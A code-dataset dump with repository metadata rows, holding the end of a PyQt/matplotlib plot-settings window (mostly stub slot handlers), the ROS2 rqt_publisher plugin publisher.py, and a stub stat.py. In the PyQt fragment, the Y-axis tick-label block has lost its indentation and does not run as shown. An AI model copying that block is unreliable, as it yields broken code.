   def on_chkBoxAxisX_TickLabBottom_clicked(self,checked):
      pass
   @pyqtSlot(bool)      ## top axis major ticklabel
   def on_chkBoxAxisX_TickLabTop_clicked(self,checked):
      pass
##==========4.4 ===major tick lines and major grid lines
   @pyqtSlot(bool)      ## bottom major tick lines
   def on_chkBoxX_majorTickBottom_clicked(self,checked):
      pass
   @pyqtSlot(bool)      ## top major tick lines
   def on_chkBoxX_majorTickTop_clicked(self,checked):
      pass
   @pyqtSlot()          ## major tick line color
   def on_btnLineColorX_majorTick_clicked(self):
      pass
   @pyqtSlot(bool)      ## show major grid lines
   def on_chkBoxX_majorGrid_clicked(self,checked):
      pass
   @pyqtSlot()          ## major grid line color
   def on_btnLineColorX_majorGrid_clicked(self):
      pass
   @pyqtSlot(str)       ## major grid line style
   def on_comboLineStyle_XmajorGrid_currentIndexChanged(self,arg1):
      pass
##==========4.5 minor tick lines and minor grid lines
   @pyqtSlot(bool)      ## bottom minor tick lines
   def on_chkBoxX_minorTickBottom_clicked(self,checked):
      pass
   @pyqtSlot(bool)      ## top minor tick lines
   def on_chkBoxX_minorTickTop_clicked(self,checked):
      pass
   @pyqtSlot()          ## minor tick line color
   def on_btnLineColorX_minorTick_clicked(self):
      pass
   @pyqtSlot(bool)      ## show minor grid lines
   def on_chkBoxX_minorGrid_clicked(self,checked):
      pass
   @pyqtSlot()          ## minor grid line color
   def on_btnLineColorX_minorGrid_clicked(self):
      pass
   @pyqtSlot(str)       ## minor grid line style
   def on_comboLineStyle_XminorGrid_currentIndexChanged(self,arg1):
      pass
##=====ToolBox group 5: === features in the "Y axis settings" page ================
   @pyqtSlot(bool)      ## axisY visibility, including label, ticks and ticklabels
   def on_groupBox_AxisY_clicked(self,checked):
      pass
##======5.1 data range======
   @pyqtSlot()          ## set_ybound sets the range; unlike set_ylim it ignores axis inversion
   def on_btnAxisY_setBound_clicked(self):
      pass
   @pyqtSlot()          ## invert_yaxis, toggle inversion
   def on_chkBoxAxisY_Invert_clicked(self):
      pass
   @pyqtSlot(str)       ## set the axis scale
   def on_comboAxisY_Scale_currentIndexChanged(self,arg1):
      pass
##======5.2 Y axis label
   def __setAxisY_Label(self,refreshDraw=True):
      pass
   @pyqtSlot(bool)      ##Y axis label visibility
   def on_groupBox_AxisYLabel_clicked(self,checked):
      pass
   @pyqtSlot()          ## set the Y axis label
   def on_btnAxisY_setLabel_clicked(self):
      self.__setAxisY_Label()
   @pyqtSlot(int)       ## font size
   def on_spinAxisY_LabelFontsize_valueChanged(self,arg1):
      self.__setAxisY_Label()
   @pyqtSlot(bool)      ## bold
   def on_chkBoxAxisY_LabelBold_clicked(self,checked):
      self.__setAxisY_Label()
   @pyqtSlot(bool)      ## italic
   def on_chkBoxAxisY_LabelItalic_clicked(self,checked):
      self.__setAxisY_Label()
   @pyqtSlot()          ## text color
   def on_btnAxisY_LabelColor_clicked(self):
      color=QColorDialog.getColor()   #QColor
      if color.isValid():
         r,g,b,a=color.getRgbF()  #getRgbF(self) -> Tuple[float, float, float, float]
         objText=self.__setAxisY_Label(False)
         objText.set_color((r,g,b,a))  # text color
         self.__fig.canvas.draw()  # refresh
@pyqtSlot(bool) ##刻度标签可见性
def on_groupBoxAxisY_TickLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置标签格式
def on_btnAxisY_TickLabFormat_clicked(self):
pass
@pyqtSlot() ##文字颜色
def on_btnAxisY_TickLabColor_clicked(self):
color=QColorDialog.getColor()
if color.isValid():
r,g,b,a=color.getRgbF()
for label in self.__curAxes.yaxis.get_ticklabels():
label.set_color((r,g,b,a))
self.__fig.canvas.draw()
@pyqtSlot(int) #字体大小
def on_spinAxisY_TickLabelFontsize_valueChanged(self,arg1):
for label in self.__curAxes.yaxis.get_ticklabels():
label.set_fontsize(arg1)
self.__fig.canvas.draw()
@pyqtSlot(bool) ##Left axis major ticklabel
def on_chkBoxAxisY_TickLabLeft_clicked(self,checked):
pass
@pyqtSlot(bool) ##right axis major ticklabel
def on_chkBoxAxisY_TickLabRight_clicked(self,checked):
pass
##==========5.4 ===major tick lines and major grid lines=====
   @pyqtSlot(bool)      ## show left major tick lines
   def on_chkBoxY_majorTickLeft_clicked(self,checked):
      pass
   @pyqtSlot(bool)      ## show right major tick lines
   def on_chkBoxY_majorTickRight_clicked(self,checked):
      pass
   @pyqtSlot()          ## major tick line color
   def on_btnLineColorY_majorTick_clicked(self):
      pass
   @pyqtSlot(bool)      ## show major grid lines
   def on_chkBoxY_majorGrid_clicked(self,checked):
      pass
   @pyqtSlot()          ## major grid line color
   def on_btnLineColorY_majorGrid_clicked(self):
      pass
   @pyqtSlot(str)       ## major grid line style
   def on_comboLineStyle_YmajorGrid_currentIndexChanged(self,arg1):
      pass
##==========5.5 ===minor tick lines and minor grid lines=====
   @pyqtSlot(bool)      ## show left minor tick lines
   def on_chkBoxY_minorTickLeft_clicked(self,checked):
      pass
   @pyqtSlot(bool)      ## show right minor tick lines
   def on_chkBoxY_minorTickRight_clicked(self,checked):
      pass
   @pyqtSlot()          ## minor tick line color
   def on_btnLineColorY_minorTick_clicked(self):
      pass
   @pyqtSlot(bool)      ## show minor grid lines
   def on_chkBoxY_minorGrid_clicked(self,checked):
      pass
   @pyqtSlot()          ## minor grid line color
   def on_btnLineColorY_minorGrid_clicked(self):
      pass
   @pyqtSlot(str)       ## minor grid line style
   def on_comboLineStyle_YminorGrid_currentIndexChanged(self,arg1):
      pass
##  =============custom slot functions===============================
   @pyqtSlot(int)
   def do_currentAxesChaned(self,index):   # current subplot changed
      pass
##  ============window test code ================================
if __name__ == "__main__":        # standalone test for this window
   app = QApplication(sys.argv)    # create the GUI application
   form=QmyMainWindow()            # create the window
   form.show()
   sys.exit(app.exec_())
| [
"[email protected]"
] | |
9d7e53e4f1b89ea971dd1e49f599e7919a008497 | 4bab98acf65c4625a8b3c757327a8a386f90dd32 | /ros2-windows/Lib/site-packages/rqt_publisher/publisher.py | ecccbf727b1edfdae4f1dbb37ffd5136f5f52b43 | [] | no_license | maojoejoe/Peach-Thinning-GTRI-Agricultural-Robotics-VIP | e2afb08b8d7b3ac075e071e063229f76b25f883a | 8ed707edb72692698f270317113eb215b57ae9f9 | refs/heads/master | 2023-01-15T06:00:22.844468 | 2020-11-25T04:16:15 | 2020-11-25T04:16:15 | 289,108,482 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,547 | py | #!/usr/bin/env python
# Copyright (c) 2011, Dorian Scholz, TU Darmstadt
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the TU Darmstadt nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import division
import array
import math
import random
import time
from python_qt_binding.QtCore import Slot, QSignalMapper, QTimer, qWarning
from rclpy.exceptions import InvalidTopicNameException
from rclpy.qos import QoSProfile
from rqt_gui_py.plugin import Plugin
from .publisher_widget import PublisherWidget
from rqt_py_common.message_helpers import get_message_class
from rqt_py_common.topic_helpers import get_slot_type
_list_types = [list, tuple, array.array]
try:
import numpy
_list_types.append(numpy.ndarray)
except ImportError:
pass
_numeric_types = [int, float]
try:
import numpy
_numeric_types += [
numpy.int8, numpy.int16, numpy.int32, numpy.int64,
numpy.float16, numpy.float32, numpy.float64, numpy.float128,
]
except ImportError:
pass
class Publisher(Plugin):
def __init__(self, context):
super(Publisher, self).__init__(context)
self.setObjectName('Publisher')
self._node = context.node
# create widget
self._widget = PublisherWidget(self._node)
self._widget.add_publisher.connect(self.add_publisher)
self._widget.change_publisher.connect(self.change_publisher)
self._widget.publish_once.connect(self.publish_once)
self._widget.remove_publisher.connect(self.remove_publisher)
self._widget.clean_up_publishers.connect(self.clean_up_publishers)
if context.serial_number() > 1:
self._widget.setWindowTitle(
self._widget.windowTitle() + (' (%d)' % context.serial_number()))
# create context for the expression eval statement
self._eval_locals = {'i': 0}
for module in (math, random, time):
self._eval_locals.update(module.__dict__)
del self._eval_locals['__name__']
del self._eval_locals['__doc__']
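        # the GUI's expression fields are eval'ed against these locals, so an
        # expression like sin(i/10.0) yields a slow sine sweep as the message
        # counter i increments with every publish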
self._publishers = {}
self._id_counter = 0
self._timeout_mapper = QSignalMapper(self)
self._timeout_mapper.mapped[int].connect(self.publish_once)
# add our self to the main window
context.add_widget(self._widget)
@Slot(str, str, float, bool)
def add_publisher(self, topic_name, type_name, rate, enabled):
topic_name = str(topic_name)
try:
self._node._validate_topic_or_service_name(topic_name)
except InvalidTopicNameException as e:
qWarning(str(e))
return
publisher_info = {
'topic_name': topic_name,
'type_name': str(type_name),
'rate': float(rate),
'enabled': bool(enabled),
}
self._add_publisher(publisher_info)
def _add_publisher(self, publisher_info):
publisher_info['publisher_id'] = self._id_counter
self._id_counter += 1
publisher_info['counter'] = 0
publisher_info['enabled'] = publisher_info.get('enabled', False)
publisher_info['expressions'] = publisher_info.get('expressions', {})
publisher_info['message_instance'] = self._create_message_instance(
publisher_info['type_name'])
if publisher_info['message_instance'] is None:
return
msg_module = get_message_class(publisher_info['type_name'])
if not msg_module:
raise RuntimeError(
'The passed message type "{}" is invalid'.format(publisher_info['type_name']))
# Topic name provided was relative, remap to node namespace (if it was set)
if not publisher_info['topic_name'].startswith('/'):
publisher_info['topic_name'] = \
self._node.get_namespace() + publisher_info['topic_name']
# create publisher and timer
publisher_info['publisher'] = self._node.create_publisher(
msg_module, publisher_info['topic_name'], qos_profile=QoSProfile(depth=10))
publisher_info['timer'] = QTimer(self)
# add publisher info to _publishers dict and create signal mapping
self._publishers[publisher_info['publisher_id']] = publisher_info
self._timeout_mapper.setMapping(publisher_info['timer'], publisher_info['publisher_id'])
publisher_info['timer'].timeout.connect(self._timeout_mapper.map)
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
self._widget.publisher_tree_widget.model().add_publisher(publisher_info)
@Slot(int, str, str, str, object)
def change_publisher(self, publisher_id, topic_name, column_name, new_value, setter_callback):
handler = getattr(self, '_change_publisher_%s' % column_name, None)
if handler is not None:
new_text = handler(self._publishers[publisher_id], topic_name, new_value)
if new_text is not None:
setter_callback(new_text)
def _change_publisher_topic(self, publisher_info, topic_name, new_value):
publisher_info['enabled'] = (new_value and new_value.lower() in ['1', 'true', 'yes'])
# qDebug(
# 'Publisher._change_publisher_enabled(): %s enabled: %s' %
# (publisher_info['topic_name'], publisher_info['enabled']))
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
else:
publisher_info['timer'].stop()
return None
def _change_publisher_type(self, publisher_info, topic_name, new_value):
type_name = new_value
# create new slot
slot_value = self._create_message_instance(type_name)
# find parent slot
slot_path = topic_name[len(publisher_info['topic_name']):].strip('/').split('/')
parent_slot = eval('.'.join(["publisher_info['message_instance']"] + slot_path[:-1]))
# find old slot
slot_name = slot_path[-1]
slot_index = parent_slot.__slots__.index(slot_name)
# restore type if user value was invalid
if slot_value is None:
qWarning('Publisher._change_publisher_type(): could not find type: %s' % (type_name))
return parent_slot._slot_types[slot_index]
else:
# replace old slot
parent_slot._slot_types[slot_index] = type_name
setattr(parent_slot, slot_name, slot_value)
self._widget.publisher_tree_widget.model().update_publisher(publisher_info)
def _change_publisher_rate(self, publisher_info, topic_name, new_value):
try:
rate = float(new_value)
except Exception:
qWarning('Publisher._change_publisher_rate(): could not parse rate value: %s' %
(new_value))
else:
publisher_info['rate'] = rate
# qDebug(
# 'Publisher._change_publisher_rate(): %s rate changed: %fHz' %
# (publisher_info['topic_name'], publisher_info['rate']))
publisher_info['timer'].stop()
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
# make sure the column value reflects the actual rate
return '%.2f' % publisher_info['rate']
def _change_publisher_expression(self, publisher_info, topic_name, new_value):
expression = str(new_value)
if len(expression) == 0:
if topic_name in publisher_info['expressions']:
del publisher_info['expressions'][topic_name]
# qDebug(
# 'Publisher._change_publisher_expression(): removed expression'
# 'for: %s' % (topic_name))
else:
# Strip topic name from the full topic path
slot_path = topic_name.replace(publisher_info['topic_name'], '', 1)
slot_path, slot_array_index = self._extract_array_info(slot_path)
# Get the property type from the message class
slot_type, is_array = \
get_slot_type(publisher_info['message_instance'].__class__, slot_path)
if slot_array_index is not None:
is_array = False
if is_array:
slot_type = list
# strip possible trailing error message from expression
error_prefix = '# error'
error_prefix_pos = expression.find(error_prefix)
if error_prefix_pos >= 0:
expression = expression[:error_prefix_pos]
success, _ = self._evaluate_expression(expression, slot_type)
if success:
old_expression = publisher_info['expressions'].get(topic_name, None)
publisher_info['expressions'][topic_name] = expression
try:
self._fill_message_slots(
publisher_info['message_instance'], publisher_info['topic_name'],
publisher_info['expressions'], publisher_info['counter'])
except Exception as e:
if old_expression is not None:
publisher_info['expressions'][topic_name] = old_expression
else:
del publisher_info['expressions'][topic_name]
return '%s %s: %s' % (expression, error_prefix, e)
return expression
else:
return '%s %s evaluating as "%s"' % (
expression, error_prefix, slot_type.__name__)
def _extract_array_info(self, type_str):
array_size = None
if '[' in type_str and type_str[-1] == ']':
type_str, array_size_str = type_str.split('[', 1)
array_size_str = array_size_str[:-1]
if len(array_size_str) > 0:
array_size = int(array_size_str)
else:
array_size = 0
return type_str, array_size
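        # e.g. 'int32[5]' -> ('int32', 5); 'int32[]' -> ('int32', 0); 'int32' -> ('int32', None)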
def _create_message_instance(self, type_str):
base_type_str, array_size = self._extract_array_info(type_str)
try:
base_message_type = get_message_class(base_type_str)
except LookupError as e:
qWarning("Creating message type {} failed. Please check your spelling and that the "
"message package has been built\n{}".format(base_type_str, e))
return None
if base_message_type is None:
return None
if array_size is not None:
message = []
for _ in range(array_size):
message.append(base_message_type())
else:
message = base_message_type()
return message
def _evaluate_expression(self, expression, slot_type):
global _list_types
global _numeric_types
successful_eval = True
try:
# try to evaluate expression
value = eval(expression, {}, self._eval_locals)
except Exception as e:
qWarning('Python eval failed for expression "{}"'.format(expression) +
' with an exception "{}"'.format(e))
successful_eval = False
if slot_type is str:
if successful_eval:
value = str(value)
else:
# for string slots just convert the expression to str, if it did not
# evaluate successfully
value = str(expression)
successful_eval = True
elif successful_eval:
type_set = set((slot_type, type(value)))
# check if value's type and slot_type belong to the same type group, i.e. array types,
# numeric types and if they do, make sure values's type is converted to the exact
# slot_type
if type_set <= set(_list_types) or type_set <= set(_numeric_types):
# convert to the right type
value = slot_type(value)
if successful_eval and isinstance(value, slot_type):
return True, value
else:
qWarning('Publisher._evaluate_expression(): failed to evaluate ' +
'expression: "%s" as Python type "%s"' % (
expression, slot_type))
return False, None
def _fill_message_slots(self, message, topic_name, expressions, counter):
global _list_types
if topic_name in expressions and len(expressions[topic_name]) > 0:
# get type
if hasattr(message, '_type'):
message_type = message._type
else:
message_type = type(message)
self._eval_locals['i'] = counter
success, value = self._evaluate_expression(expressions[topic_name], message_type)
if not success:
value = message_type()
return value
# if no expression exists for this topic_name, continue with it's child slots
elif hasattr(message, 'get_fields_and_field_types'):
for slot_name in message.get_fields_and_field_types().keys():
value = self._fill_message_slots(
getattr(message, slot_name),
topic_name + '/' + slot_name, expressions, counter)
if value is not None:
setattr(message, slot_name, value)
elif type(message) in _list_types and (len(message) > 0):
for index, slot in enumerate(message):
value = self._fill_message_slots(
slot, topic_name + '[%d]' % index, expressions, counter)
# this deals with primitive-type arrays
if not hasattr(message[0], '__slots__') and value is not None:
message[index] = value
return None
@Slot(int)
def publish_once(self, publisher_id):
publisher_info = self._publishers.get(publisher_id, None)
if publisher_info is not None:
publisher_info['counter'] += 1
self._fill_message_slots(
publisher_info['message_instance'],
publisher_info['topic_name'],
publisher_info['expressions'],
publisher_info['counter'])
publisher_info['publisher'].publish(publisher_info['message_instance'])
@Slot(int)
def remove_publisher(self, publisher_id):
publisher_info = self._publishers.get(publisher_id, None)
if publisher_info is not None:
publisher_info['timer'].stop()
self._node.destroy_publisher(publisher_info['publisher'])
del publisher_info['publisher']
del self._publishers[publisher_id]
def save_settings(self, plugin_settings, instance_settings):
publisher_copies = []
for publisher in self._publishers.values():
publisher_copy = {}
publisher_copy.update(publisher)
publisher_copy['enabled'] = False
del publisher_copy['timer']
del publisher_copy['message_instance']
del publisher_copy['publisher']
publisher_copies.append(publisher_copy)
instance_settings.set_value('publishers', repr(publisher_copies))
def restore_settings(self, plugin_settings, instance_settings):
# If changing perspectives and rqt_publisher is already loaded, we need to clean up the
# previously existing publishers
self.clean_up_publishers()
publishers = eval(instance_settings.value('publishers', '[]'))
for publisher in publishers:
self._add_publisher(publisher)
def clean_up_publishers(self):
self._widget.publisher_tree_widget.model().clear()
for publisher_info in self._publishers.values():
publisher_info['timer'].stop()
self._node.destroy_publisher(publisher_info['publisher'])
self._publishers = {}
def shutdown_plugin(self):
self._widget.shutdown_plugin()
self.clean_up_publishers()
| [
"[email protected]"
] | |
49a7d67eecf924882e9f2aa4097d4b1d2d124264 | ec46c70a721f16031a784f54f522656fb43dfc9f | /venv/lib/python3.6/stat.py | 4d858099ad6d6f85e6e7bf6703e84af7a7511e3c | [] | no_license | kardelen-karatas/django-importXML | c6a62942b740697d3647ec0bc1ed9c078e751159 | b169966627bd54b684aaedd5fd6c0d7be551b973 | refs/heads/master | 2022-12-10T00:38:40.578278 | 2020-04-15T10:34:36 | 2020-04-15T10:34:36 | 125,032,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 58 | py | /home/kardelen/.pyenv/versions/3.6.3/lib/python3.6/stat.py | [
"[email protected]"
] |